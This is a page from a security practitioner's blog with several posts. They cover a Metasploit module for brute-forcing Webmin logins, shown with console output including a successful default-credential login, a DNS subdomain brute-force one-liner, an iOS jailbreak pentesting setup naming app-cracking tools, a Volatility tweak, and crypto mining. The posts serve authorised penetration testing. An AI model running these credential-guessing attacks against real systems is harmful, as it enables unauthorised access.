carnal0wnage [Shared Reader]

Tuesday, March 25, 2014

DNS Brute String

just sticking this here so i can find it later. thanks @mubix

cat hosts.txt | xargs -t -I subdomain dig +noall subdomain.THEDOMAIN.com +answer

update, rob pointed me to his post on it

http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/

Wednesday, March 12, 2014

Webmin Brute Forcing

So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it.

At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts.  I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.

I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt

PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run

[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' 
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'

[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)


and looks like this when it works

[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.

Code is here
https://github.com/carnal0wnage/metasploit-framework/blob/webminmodule/modules/auxiliary/scanner/http/webmin_login.rb

figured i'd let the blog serve as way to let people test prior to doing a pull request.

CG

Thursday, February 20, 2014

Finding malicious DLLs with Volatility

Colin and I were working on an memory image the other day and needed to find DLLs loaded by svchost.exe. We turned to everyone's default memory analysis tool Volatility. Volatility doesn't really give you a good option to search for loaded dlls by process name. You can specify a pid to do this, but when you have many processes that have the same name (ie svchost.exe) you can end up with a nasty command like this to do the trick.




This really wasn't working for us so we took a look at Volatility's source code and made some small adjustments.  We modified the taskmods.py module that ultimately affects the dlllist module. Normally if you select dlllist plugin with the -h option it gives you various options you can use such as an offset or a pid as seen below:

With our modified taskmods.py you have a new option for adding a process by name or a list of processes by name as seen below:


Now we can simply give it the svchost.exe process by name and get a list of loaded DLL's by processes running by that name. If you have a non-standard svchost.exe process running then this will pick it up as well, but that situation might also help identify a compromise :)

So executing volatility with the following command
vol.py -f 7re-912d4ad7.vmem --profile Win7SP1x64 dlllist -n svchost.exe now gives an output of:




I am sure there are better ways at getting the same information, but this worked rather well for us and we thought we would share. You can get the module at our github repository.

To install it just replace the taskmods.py from your $VOLATILITYHOME/volatility/plugins directory with our taskmods.py.

We have tested it on volatility 2.2, 2.3, 2.3.1 on XP and Windows 7 with no problems.





Thursday, January 2, 2014

Modern Day Gold Mining

Well maybe not Gold...but Litecoins, hobonickels, dodgecoins, and other kinds of *coins*

We've all heard about Bitcoins (BTC) and all wish we had bought a few hundred 2 years ago so we could retire today but who knew...

We'll its too late to get in the bitcoin game due to the difficultiy of mining one being super high but thankfully 60+ alternate crypto currencies have sprung up and thanks to sites like www.cryptsy.com  you can now trade those alternate currencies for BTC.

want to know what to mine? you can check out http://www.coinwarz.com/cryptocurrency or http://www.coinarmy.com/

Punch in the numbers for your SHA256/scrypt cracking ability and get an idea what to mine to make the most $$$ the fastest. so if you can do 300 KH/s (average cheap GPU)


in 166 days you can make one Bitcoin (BTC) mining Netcoins and exchanging them at current rate where it would take more like 2000 days to make a Bitcoin.


OMG its raining money! sort of.

anyway its neat.  seems like a good reason to set up a build a hash cracker, write it off for security stuff, and have it mining when its not busy converting hashes into plaintext.


Couple articles on it:

http://motherboard.vice.com/blog/beyond-bitcoin-a-guide-to-the-most-promising-cryptocurrencies
http://www.zdnet.com/a-crypto-currency-primer-bitcoin-vs-litecoin-7000024301/
http://alunacrypto.blogspot.ca/2013/12/a-new-wave-of-2nd-generation.html

Solo Mining vs Pools
http://bitcoin.stackexchange.com/questions/11471/what-are-the-advantages-and-disadvantages-of-pooled-mining
http://www.devtome.com/doku.php?id=mining_pools_vs_solo_mining

Hardware comparison to get an idea what numbers to put into those crunchers.

https://litecoin.info/Mining_hardware_comparison

You can even buy a 6 graphic card motherboard for mining, stock trading or making everyone (well your geek homies) jealous



happy cracking/mining

P.S.
From a hacker shit perspective... i cant image the mining pool software is very good. its probably worth taking a look at it. :-)

Saturday, December 28, 2013

Creating a iOS7 Application Pentesting Environment




Now that you have your shiny new Evasion7 jailbreak running it's time to set up the environment for application testing!

Getting in

(cross-posted with permission from CG from my work blog)


Since mobile substrate is not working yet we will focus on getting our idevice up and running as a functioning *nix environment and install some tools that don't require substrate.


First we need to get into our iDevices shell prompt. We will browse Cydia (that gets installed by default with the jailbreak) and then will install the openSSH package





Once we get openSSH installed you can SSH into your device by finding its IP address in the Settings > Wireless Networks > Advanced ">" menu. 



Now SSH into port 22  on that IP using the username "root" and the password "alpine".

Once we have shell we can use APT to install most of the other packages we need. Also change the default root password to something else so people can't mess with your phone!

Arming your iDevice with *nix tools


To have a functioning *nix environment we need to install a ton of utilities that aren't usually installed as part of the default jailbreak or Bash shell. This includes utilities like strings, grep, awk, find, etc...

Some of the utility packages do not verbatim tell what's inside of them; things like big boss tools and Erika utilities.

These two in specific install strings and other binutils type tools. Several of them patched or modded to work on the iOS architecture (arm).

Packages (some of these will be pre-installed with the JB):


adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar

tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip



Take this list and dump it to a file (packages.txt) and run:

apt-get  install $(<packages.txt)



Extras


In addition to utilities that help make our iDevice a functioning *nix environment there are several tools that aid in connecting, controlling, reverse engineering, and monitoring iOS applications. Below is a list of those tools, a description, and their locations (some cut from my OWASP page):


Tool
Link
Description
USBMuxd
http://cgit.sukimashita.com/usbmuxd.git/
Tunnel ports over USB (enable SSH without network using localhost:2222)
libimobiledevice
http://www.libimobiledevice.org/
Library. Custom implementation of iTunes type connections, file-system access, system access.
Filemon
Monitor realtime iOS file system
FileDP
Audits data protection of files
BinaryCookieReader
Read cookies.binarycookies files
lsof ARM Binary
list of all open files and the processes that opened them
lsock ARM Binary
monitor socket connections
removePIE
Disables ASLR of an application
Clutch
https://github.com/KJCracks/Clutch-dl/releases
Application Cracker compiled (remove encryption)
Rasticrac
https://twitter.com/iRastignac
Application Cracker (BASH GDB Wrapper)

Next steps


This is just the basics.

Once you get all of these utilities and tools installed you're pretty much waiting on substrate to be working for iOS 7. After that's done you can install your favorite all encompassing or homegrown tool that uses substrate to do hooking such as Cycript, Inlyzer, SSLKillSwitch, Snoopit, IntroSpy, iAuditor, etc.

Then you just have to MitM the web traffic. There are plenty of guides on that around the net. 

If you have other tools you use in your app assessment setup we'd love to hear about it. Feel free to leave suggestions in the comments. 


Thursday, December 26, 2013

Where has CG been?

I've been here....work has kept me super busy...pretty sure there is a post in 2012 that says about the same. :-/

I attempted to recruit some smart people to make some posts and they did so thanks to all the guest bloggers this year.

so what's been up?

well I've taken on two hobbies that don't directly tie into this blog. One, Christmas lights, like the obnoxious programmables RGB color ones. Facebook friends have been kept abreast of the situation.  Two, stock trading...which i found out a fair number of hackers are into...which is cool. The stock stuff came about from reading the Rich Dad Poor Dad book and trying to figure out a way not to have to work until i die. See that post for a tiny bit more explanation.

I've been told by a few people that readers would probably find the xmas light stuff interesting as it does involve cat-5 cables and packets over Ethernet frames. So I'll start knowledge dumping in Jan on that topic.

anyway. Tech stuff....whats up?

Shitty passwords are whats up this year (totally new issue right??!!!). I didn't go back and count but a large majority of the tests I performed or assisted with this year where there was some sort of single factor login portal (SSLVPN, Citrix, OWA, etc) fell over to one of the following:


Its 2013 almost 2014 as I write this, its sad that we are still dealing with this like this a new or unsolvable problem.  Just reaffirms to me that we are failing as an industry if today we can break into some organization that spends any dollars on security with Password1. Its really no mystery why bad guys are beating the piss out of people.

Earlier this year a guy that does work on things in China gave a talk and said that the Chinese culture thing about security like this: (to paraphrase):

"if an organization doesnt protect against stealing it, they must not care about it"  

Protecting your important **stuff** with Password1, or a web application where any web vulnerability scanner finds SQL... yeah its no surprise when someone steals your *whatever*.

Grumpiness aside, we did do some neat shit this year.  A pseudo highlight reel can be found in the string of talks that Chris Nickerson, Eric Smith,  and Mubix and I gave at Derbycon this year.




Lares continues to break into hard to break into places using Red Teaming.


I also gave a talk at a credit union conference a few months ago where i tried to sum up how organizations are getting owned. TLDR; its all stuff we know about, but it takes work to fix, so not that many organizations do it.



I've been kind of a deadbeat on talking in 2013 but i have a few ideas on some talks for 2014, ideally blog posts either here or the Lares blog will help me work those ideas into posts and eventually into a slide deck(s).


Monday, December 23, 2013

Best non-technical book I read this year

So first of a few end of year posts...

Best non-technical book i read this year was Rich Dad Poor Dad


I'd like to thank Joe McCray for recommending it to me. I wish i had read the book in my teens and/or my twenties. There are TONS of reviews on the book i'd encourage everyone remotely interested to read a mix of the 5 star and 1 star ones to get a feel.  I'll even drop the most important thing i got from the book here:

Assets make you money, liabilities cost you money. To build wealth you need to accumulate assets.

Pretty simple right?!  Unfortunately most of us (myself included) have been brought up to look at things like houses, cars, expensive things as assets because we can sell them if we need to for $$. However after being a former BMW owner and a current house owner i can attest that the mentioned items did not *make* me any money. In fact the house is a constant source of cash outflow. This is exactly what the book talks about.

Now to be fair, and if you read the reviews this will come across, there is A LOT of magic hand waving on how one starts buying assets instead of liabilities and growing wealth. The author uses real estate and mentions you can start a business or build wealth via stocks/trading as other ways to build wealth (assets). None of those in my opinion are quick, easy, or cheap to get started in and none of those come without a hefty education requirement in order not to lose your starting capital. Nevertheless, the value in the book comes from identifying the problem of how poor people view and interact with money and how rich people view and interact with money as well as giving a general road map on a new way to think about building wealth.

thoughts?

CG